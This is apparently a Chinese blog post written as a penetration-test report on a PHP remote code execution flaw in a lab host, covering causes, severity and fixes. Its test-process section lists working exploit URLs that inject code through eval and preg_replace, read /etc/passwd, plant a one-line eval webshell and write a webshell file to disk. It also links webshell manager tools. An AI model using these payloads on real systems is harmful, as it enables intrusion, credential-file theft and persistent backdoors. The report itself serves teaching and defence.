1.远程代码执行漏洞
漏洞名称
远程代码执行漏洞
漏洞地址
http://10.211.55.2/eval.php?data=phpinfo()
http://10.211.55.2/eval.php?data=1;phpinfo()
http://10.211.55.2/eval.php?data=$%7bphpinfo()%7d
漏洞等级
超危
漏洞描述
用户通过浏览器提交执行命令,由于服务端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变$PATH或程序执行环境的其他方面来执行一个恶意构造的代码。
漏洞成因
服务端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。
在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。
由于开发人员编写源码,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句提交,并交由服务端执行。命令注入攻击中WEB服务器没有过滤类似system()
,eval()
,exec()
,assert()
,preg replace() + /e
模式等函数是该漏洞攻击成功的最主要原因。
漏洞危害
允许攻击者通过改变$PATH或程序执行环境的其他方面来执行一个恶意构造的代码。
修复方案
通用方案
1.使用低权限用户执行应用程序。2.升级组件到最新版本。3.配置或代码过滤危险函数,例如eval()
、assert()
、preg replace()+/e
模式等。
PHP
1.对于eval()
和assert()
函数一定要保证用户不能轻易接触eval()
和assert()
的参数或者用正则严格判断输入的数据格式。2.对于字符串一定要使用单引号包裹可控代码,并且插入前进行addslashes。3.对于preg replace()
放弃使用/e修饰符。如果必须要用/e修饰符,请保证第二个参数中,对于正则匹配出的对象,用单引号包裹。
测试过程
http://10.211.55.2/eval.php
http://10.211.55.2/eval.php?data=phpinfo()
http://10.211.55.2/eval.php?data=1;phpinfo()
http://10.211.55.2/eval.php?data=${phpinfo()}
http://10.211.55.2/eval.php
http://10.211.55.2/eval.php?data=1%27);phpinfo();//
http://10.211.55.2/eval.php
http://10.211.55.2/eval.php?data=${phpinfo()}
http://10.211.55.2/eval.php?data=%22);phpinfo();//
http://10.211.55.2/preg_replace.php
http://10.211.55.2/preg_replace.php?data=%3Cdata%3E${phpinfo()}%3C/data%3E
http://10.211.55.2/eval.php?data=@eval($_POST[1])
一句话木马
http://10.211.55.2/eval.php?data=print(getcwd())
获取当前工作路径
http://10.211.55.2/eval.php?data=var_dump(file_get_contents($_GET[f]))&f=/etc/passwd
http://10.211.55.2/eval.php?data=var_dump(file_put_contents($_GET[f],$_GET[d]))&f=1.php&d=%3C?php%20@eval($_POST[1]);
哥斯拉
https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla
蚁剑
https://github.com/AntSwordProject/AntSword-Loader/releases/tag/4.0.3
https://github.com/AntSwordProject/antSword
圈子菜刀
冰蝎
https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_11
天蝎
复测情况
已修复
测试人员
南风向晚
粉丝主动打赏看这里
全系列共105篇,持续更新中
原文始发于微信公众号(利刃藏锋):远程代码执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论